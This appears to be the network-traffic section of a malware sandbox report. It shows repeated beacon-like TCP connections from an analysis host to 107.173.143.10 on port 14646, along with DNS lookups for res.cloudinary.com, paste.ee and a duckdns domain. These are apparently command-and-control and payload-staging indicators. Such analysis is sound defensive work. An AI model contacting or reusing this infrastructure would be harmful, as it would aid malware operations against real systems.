Dec 13, 2024 07:41:01.459501028 CET	14646	50029	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:01.460505962 CET	50029	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:01.463635921 CET	50029	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:01.583539963 CET	14646	50029	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:03.405148029 CET	14646	50029	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:03.405549049 CET	50029	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:03.408219099 CET	50029	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:03.527986050 CET	14646	50029	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:04.136281013 CET	50030	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:04.256431103 CET	14646	50030	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:04.256565094 CET	50030	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:04.259584904 CET	50030	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:04.379498959 CET	14646	50030	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:06.219419003 CET	14646	50030	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:06.220763922 CET	50030	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:06.220829964 CET	50030	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:06.340702057 CET	14646	50030	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:06.917567968 CET	50032	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:07.037475109 CET	14646	50032	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:07.037595034 CET	50032	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:07.042709112 CET	50032	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:07.162538052 CET	14646	50032	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:09.028120995 CET	14646	50032	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:09.028196096 CET	50032	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:09.028296947 CET	50032	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:09.148251057 CET	14646	50032	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:09.701925993 CET	50033	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:09.821966887 CET	14646	50033	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:09.822094917 CET	50033	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:09.827394962 CET	50033	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:09.947215080 CET	14646	50033	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:11.762700081 CET	14646	50033	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:11.763700962 CET	50033	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:11.763789892 CET	50033	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:11.883646965 CET	14646	50033	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:12.418405056 CET	50034	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:12.538297892 CET	14646	50034	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:12.538413048 CET	50034	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:12.542335987 CET	50034	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:12.662228107 CET	14646	50034	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:14.501120090 CET	14646	50034	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:14.501226902 CET	50034	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:14.501226902 CET	50034	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:14.621303082 CET	14646	50034	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:15.136253119 CET	50035	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:15.256572962 CET	14646	50035	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:15.256774902 CET	50035	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:15.260665894 CET	50035	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:15.380482912 CET	14646	50035	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:17.204736948 CET	14646	50035	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:17.204840899 CET	50035	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:17.204943895 CET	50035	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:17.324743986 CET	14646	50035	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:17.808820009 CET	50036	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:17.928845882 CET	14646	50036	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:17.928981066 CET	50036	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:17.932640076 CET	50036	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:18.052489996 CET	14646	50036	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:19.876583099 CET	14646	50036	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:19.876653910 CET	50036	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:19.876696110 CET	50036	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:19.996566057 CET	14646	50036	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:20.464407921 CET	50037	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:20.584412098 CET	14646	50037	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:20.585724115 CET	50037	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:20.589121103 CET	50037	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:20.709038973 CET	14646	50037	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:22.528286934 CET	14646	50037	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:22.528369904 CET	50037	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:22.528436899 CET	50037	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:22.648490906 CET	14646	50037	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:23.105137110 CET	50038	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:23.225227118 CET	14646	50038	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:23.225398064 CET	50038	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:23.229090929 CET	50038	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:23.348892927 CET	14646	50038	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:25.173295975 CET	14646	50038	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:25.173374891 CET	50038	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:25.173432112 CET	50038	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:25.321675062 CET	14646	50038	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:25.730593920 CET	50039	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:25.850363970 CET	14646	50039	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:25.853766918 CET	50039	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:25.857093096 CET	50039	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:25.977123976 CET	14646	50039	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:27.798537970 CET	14646	50039	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:27.798618078 CET	50039	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:27.798736095 CET	50039	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:27.918561935 CET	14646	50039	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:28.339451075 CET	50040	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:28.459537029 CET	14646	50040	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:28.459621906 CET	50040	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:28.463121891 CET	50040	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:28.583302975 CET	14646	50040	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:30.445139885 CET	14646	50040	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:30.449599028 CET	50040	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:30.449886084 CET	50040	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:30.569827080 CET	14646	50040	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:30.965010881 CET	50041	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:31.085658073 CET	14646	50041	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:31.085760117 CET	50041	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:31.089746952 CET	50041	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:31.209595919 CET	14646	50041	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:33.032520056 CET	14646	50041	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:33.032753944 CET	50041	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:33.032809019 CET	50041	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:33.152766943 CET	14646	50041	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:33.526921988 CET	50042	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:33.646980047 CET	14646	50042	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:33.649730921 CET	50042	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:33.656326056 CET	50042	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:33.776319981 CET	14646	50042	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:35.610647917 CET	14646	50042	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:35.613607883 CET	50042	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:35.613652945 CET	50042	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:35.733486891 CET	14646	50042	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:36.090061903 CET	50043	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:36.210248947 CET	14646	50043	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:36.210362911 CET	50043	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:36.214281082 CET	50043	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:36.334252119 CET	14646	50043	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:38.138243914 CET	14646	50043	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:38.138463020 CET	50043	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:38.138463020 CET	50043	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:38.259000063 CET	14646	50043	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:38.605185032 CET	50044	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:38.725337982 CET	14646	50044	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:38.725836039 CET	50044	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:38.729197979 CET	50044	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:38.849088907 CET	14646	50044	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:40.673593044 CET	14646	50044	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:40.676629066 CET	50044	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:40.676681042 CET	50044	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:40.796521902 CET	14646	50044	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:41.136179924 CET	50045	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:41.256376028 CET	14646	50045	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:41.256500006 CET	50045	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:41.259968996 CET	50045	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:41.379869938 CET	14646	50045	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:43.185717106 CET	14646	50045	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:43.185847044 CET	50045	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:43.185847044 CET	50045	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:43.306345940 CET	14646	50045	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:43.620558977 CET	50046	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:43.741384983 CET	14646	50046	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:43.741684914 CET	50046	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:43.744708061 CET	50046	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:43.865201950 CET	14646	50046	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:45.704817057 CET	14646	50046	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:45.707695007 CET	50046	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:45.707735062 CET	50046	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:45.827507019 CET	14646	50046	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:46.136718988 CET	50047	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:46.256668091 CET	14646	50047	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:46.256757975 CET	50047	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:46.261832952 CET	50047	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:46.381602049 CET	14646	50047	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:48.217274904 CET	14646	50047	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:48.217483044 CET	50047	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:48.220004082 CET	50047	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:48.339734077 CET	14646	50047	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:48.620745897 CET	50048	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:48.740564108 CET	14646	50048	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:48.743779898 CET	50048	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:48.748740911 CET	50048	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:48.869868994 CET	14646	50048	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:50.686110973 CET	14646	50048	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:50.687439919 CET	50048	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:50.687495947 CET	50048	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:50.807372093 CET	14646	50048	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:51.089553118 CET	50049	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:51.209892988 CET	14646	50049	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:51.210026979 CET	50049	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:51.213255882 CET	50049	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:51.333086967 CET	14646	50049	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:53.138235092 CET	14646	50049	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:53.138304949 CET	50049	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:53.138346910 CET	50049	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:53.258121967 CET	14646	50049	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:53.527581930 CET	50050	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:53.647505045 CET	14646	50050	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:53.647593975 CET	50050	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:53.651429892 CET	50050	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:53.771269083 CET	14646	50050	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:55.591486931 CET	14646	50050	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:55.591617107 CET	50050	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:55.591660976 CET	50050	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:55.711456060 CET	14646	50050	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:55.964302063 CET	50051	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:56.084218025 CET	14646	50051	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:56.084363937 CET	50051	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:56.087426901 CET	50051	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:56.207216978 CET	14646	50051	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:58.054640055 CET	14646	50051	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:58.057646990 CET	50051	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:58.057727098 CET	50051	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:58.177714109 CET	14646	50051	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:58.774450064 CET	50052	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:58.894385099 CET	14646	50052	107.173.143.10	192.168.2.6
Dec 13, 2024 07:41:58.898336887 CET	50052	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:58.900665045 CET	50052	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:41:59.020596027 CET	14646	50052	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:00.826026917 CET	14646	50052	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:00.828623056 CET	50052	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:00.828670025 CET	50052	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:00.949013948 CET	14646	50052	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:01.183202982 CET	50053	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:01.303559065 CET	14646	50053	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:01.304661036 CET	50053	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:01.308254957 CET	50053	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:01.428359985 CET	14646	50053	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:03.248080969 CET	14646	50053	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:03.248162985 CET	50053	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:03.248194933 CET	50053	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:03.367949963 CET	14646	50053	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:03.589389086 CET	50054	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:03.709544897 CET	14646	50054	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:03.709765911 CET	50054	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:03.713136911 CET	50054	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:03.833190918 CET	14646	50054	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:05.655410051 CET	14646	50054	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:05.655494928 CET	50054	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:05.655566931 CET	50054	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:05.775855064 CET	14646	50054	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:05.980487108 CET	50055	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:06.100716114 CET	14646	50055	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:06.100831985 CET	50055	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:06.103779078 CET	50055	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:06.227410078 CET	14646	50055	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:08.045093060 CET	14646	50055	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:08.045202017 CET	50055	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:08.045253992 CET	50055	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:08.165208101 CET	14646	50055	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:08.355669022 CET	50057	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:08.475868940 CET	14646	50057	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:08.475994110 CET	50057	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:08.479403019 CET	50057	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:08.599423885 CET	14646	50057	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:10.421273947 CET	14646	50057	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:10.421554089 CET	50057	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:10.435905933 CET	50057	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:10.555893898 CET	14646	50057	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:10.770919085 CET	50058	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:10.891058922 CET	14646	50058	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:10.891156912 CET	50058	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:10.894469023 CET	50058	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:11.014692068 CET	14646	50058	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:12.827734947 CET	14646	50058	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:12.828519106 CET	50058	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:12.830444098 CET	50058	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:12.950450897 CET	14646	50058	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:13.120668888 CET	50059	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:13.241342068 CET	14646	50059	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:13.241580963 CET	50059	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:13.244570971 CET	50059	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:13.365168095 CET	14646	50059	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:15.191626072 CET	14646	50059	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:15.191735983 CET	50059	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:15.191827059 CET	50059	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:15.312072992 CET	14646	50059	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:15.480000973 CET	50060	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:15.602108002 CET	14646	50060	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:15.602225065 CET	50060	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:15.605756044 CET	50060	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:15.726283073 CET	14646	50060	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:17.545963049 CET	14646	50060	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:17.546058893 CET	50060	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:17.546103954 CET	50060	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:17.666310072 CET	14646	50060	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:17.823847055 CET	50061	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:17.943770885 CET	14646	50061	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:17.943869114 CET	50061	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:17.948187113 CET	50061	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:18.068137884 CET	14646	50061	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:19.874264956 CET	14646	50061	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:19.874365091 CET	50061	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:19.883943081 CET	50061	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:20.003779888 CET	14646	50061	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:20.256083965 CET	50062	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:20.376173019 CET	14646	50062	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:20.376252890 CET	50062	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:20.381109953 CET	50062	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:20.501859903 CET	14646	50062	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:22.311111927 CET	14646	50062	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:22.311362028 CET	50062	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:22.311362982 CET	50062	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:22.431740999 CET	14646	50062	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:22.573801994 CET	50063	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:22.694093943 CET	14646	50063	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:22.694289923 CET	50063	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:23.210550070 CET	50063	14646	192.168.2.6	107.173.143.10
Dec 13, 2024 07:42:23.330738068 CET	14646	50063	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:24.639146090 CET	14646	50063	107.173.143.10	192.168.2.6
Dec 13, 2024 07:42:24.639244080 CET	50063	14646	192.168.2.6	107.173.143.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 07:38:31.347354889 CET	62844	53	192.168.2.6	1.1.1.1
Dec 13, 2024 07:38:31.484358072 CET	53	62844	1.1.1.1	192.168.2.6
Dec 13, 2024 07:38:51.825297117 CET	65334	53	192.168.2.6	1.1.1.1
Dec 13, 2024 07:38:51.963633060 CET	53	65334	1.1.1.1	192.168.2.6
Dec 13, 2024 07:38:55.092498064 CET	61862	53	192.168.2.6	1.1.1.1
Dec 13, 2024 07:38:55.407963991 CET	53	61862	1.1.1.1	192.168.2.6
Dec 13, 2024 07:39:57.060942888 CET	59534	53	192.168.2.6	1.1.1.1
Dec 13, 2024 07:39:57.390291929 CET	53	59534	1.1.1.1	192.168.2.6
Dec 13, 2024 07:40:58.214349031 CET	53504	53	192.168.2.6	1.1.1.1
Dec 13, 2024 07:40:58.521595955 CET	53	53504	1.1.1.1	192.168.2.6
Dec 13, 2024 07:41:58.417367935 CET	52925	53	192.168.2.6	1.1.1.1
Dec 13, 2024 07:41:58.771136045 CET	53	52925	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 13, 2024 07:38:31.347354889 CET	192.168.2.6	1.1.1.1	0x35a0	Standard query (0)	res.cloudinary.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 07:38:51.825297117 CET	192.168.2.6	1.1.1.1	0xc2f7	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
Dec 13, 2024 07:38:55.092498064 CET	192.168.2.6	1.1.1.1	0x89c1	Standard query (0)	newglobalfucntioninside.duckdns.org	A (IP address)	IN (0x0001)	false
Dec 13, 2024 07:39:57.060942888 CET	192.168.2.6	1.1.1.1	0x73e	Standard query (0)	newglobalfucntioninside.duckdns.org	A (IP address)	IN (0x0001)	false
Dec 13, 2024 07:40:58.214349031 CET	192.168.2.6	1.1.1.1	0xf3b2	Standard query (0)	newglobalfucntioninside.duckdns.org	A (IP address)	IN (0x0001)	false
Dec 13, 2024 07:41:58.417367935 CET	192.168.2.6	1.1.1.1	0x19f9	Standard query (0)	newglobalfucntioninside.duckdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 13, 2024 07:38:31.484358072 CET	1.1.1.1	192.168.2.6	0x35a0	No error (0)	res.cloudinary.com	cloudinary.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 07:38:31.484358072 CET	1.1.1.1	192.168.2.6	0x35a0	No error (0)	cloudinary.map.fastly.net		151.101.1.137	A (IP address)	IN (0x0001)	false
Dec 13, 2024 07:38:31.484358072 CET	1.1.1.1	192.168.2.6	0x35a0	No error (0)	cloudinary.map.fastly.net		151.101.65.137	A (IP address)	IN (0x0001)	false
Dec 13, 2024 07:38:31.484358072 CET	1.1.1.1	192.168.2.6	0x35a0	No error (0)	cloudinary.map.fastly.net		151.101.193.137	A (IP address)	IN (0x0001)	false
Dec 13, 2024 07:38:31.484358072 CET	1.1.1.1	192.168.2.6	0x35a0	No error (0)	cloudinary.map.fastly.net		151.101.129.137	A (IP address)	IN (0x0001)	false
Dec 13, 2024 07:38:51.963633060 CET	1.1.1.1	192.168.2.6	0xc2f7	No error (0)	paste.ee		104.21.84.67	A (IP address)	IN (0x0001)	false
